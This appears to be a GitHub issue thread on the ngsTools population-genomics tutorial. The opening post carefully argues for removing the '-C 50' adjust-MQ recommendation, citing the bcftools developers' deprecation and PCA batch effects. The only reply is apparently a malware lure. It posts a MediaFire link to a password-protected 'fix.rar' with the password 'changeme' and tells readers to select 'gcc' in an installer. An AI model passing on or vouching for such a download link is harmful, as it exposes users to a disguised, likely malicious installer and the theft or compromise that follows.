### ISSUE TITLE
Deprecation of "-C 50" recommendation

### ISSUE THREAD

**Issue by gmanthey** [mfumagalli/ngsTools#38]
Hi there! 
The samtools/bcftools developers have recently revisited the `-C/--adjust-MQ` option in bcftools and found that the code was not designed for modern sequencing technologies and aligners and currently don't recommend using the feature (see https://github.com/samtools/bcftools/issues/2217 and https://github.com/samtools/bcftools/blob/develop/doc/bcftools.txt#L2237). The option is also mirrored in ANGSD, which internally calls the htslib library function that is also used by bcftools and samtools.

We have run into 2 (unpublished) cases now where we had previously used the option with the usually suggested value of 50, where dropping the option caused a significant difference in a genome wide PCA, in one case reducing a batch effect and in the other causing a better correlation of the major PCs with geographic distances, suggesting that the usage of this option can add non-biological variation in genotypes and filter out actual biological variation.

Given the popularity of your repository for people learning population genomic analysis (which, btw., is an amazing resource that I want to thank you for providing) and the tendency of people to continue to use the options you suggest here (I found this by following someone elses code from a manuscript where they had used this option as well), I would suggest to remove the recommendation of using `-C 50` from your tutorial.

Cheers!

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."
